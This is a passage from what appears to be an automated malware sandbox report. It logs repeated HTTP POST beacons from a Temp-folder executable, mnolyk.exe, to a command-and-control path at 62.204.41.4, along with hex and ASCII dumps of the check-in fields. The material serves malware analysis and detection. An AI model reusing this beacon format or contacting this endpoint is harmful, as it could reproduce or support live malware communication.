                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    191 | 192.168.2.3 | 49893 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:09.064081907 CET | 392 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:09.130045891 CET | 392 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    192 | 192.168.2.3 | 49894 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:09.316596985 CET | 393 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:09.380016088 CET | 393 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    193 | 192.168.2.3 | 49895 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:09.563401937 CET | 394 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:09.627557039 CET | 394 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    194 | 192.168.2.3 | 49896 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:09.795234919 CET | 395 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:09.859213114 CET | 395 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    195 | 192.168.2.3 | 49897 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:10.032773018 CET | 396 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:10.098812103 CET | 396 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    196 | 192.168.2.3 | 49898 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:10.281507015 CET | 397 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:10.345503092 CET | 397 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    197 | 192.168.2.3 | 49899 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:10.520937920 CET | 398 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:10.584842920 CET | 398 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    198 | 192.168.2.3 | 49900 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:10.776958942 CET | 399 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:10.842241049 CET | 399 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    199 | 192.168.2.3 | 49901 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:11.021220922 CET | 400 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:11.086133003 CET | 400 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    2 | 192.168.2.3 | 49703 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:09.854969025 CET | 134 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:09.918930054 CET | 149 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    20 | 192.168.2.3 | 49721 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:17.546134949 CET | 221 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:17.612584114 CET | 221 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    200 | 192.168.2.3 | 49902 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:11.276709080 CET | 401 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:11.341573000 CET | 401 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    201 | 192.168.2.3 | 49903 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:11.766469002 CET | 402 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:11.832688093 CET | 402 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    202 | 192.168.2.3 | 49904 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:12.046729088 CET | 403 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:12.111684084 CET | 403 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    203 | 192.168.2.3 | 49905 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:12.384320021 CET | 404 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:12.449224949 CET | 404 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    204 | 192.168.2.3 | 49906 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:12.698779106 CET | 405 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:12.762974024 CET | 405 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    205 | 192.168.2.3 | 49907 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:13.917743921 CET | 406 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:13.983855963 CET | 406 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    206 | 192.168.2.3 | 49908 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:14.246090889 CET | 407 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:14.312478065 CET | 407 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    207 | 192.168.2.3 | 49909 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:14.933906078 CET | 408 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:14.998792887 CET | 408 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
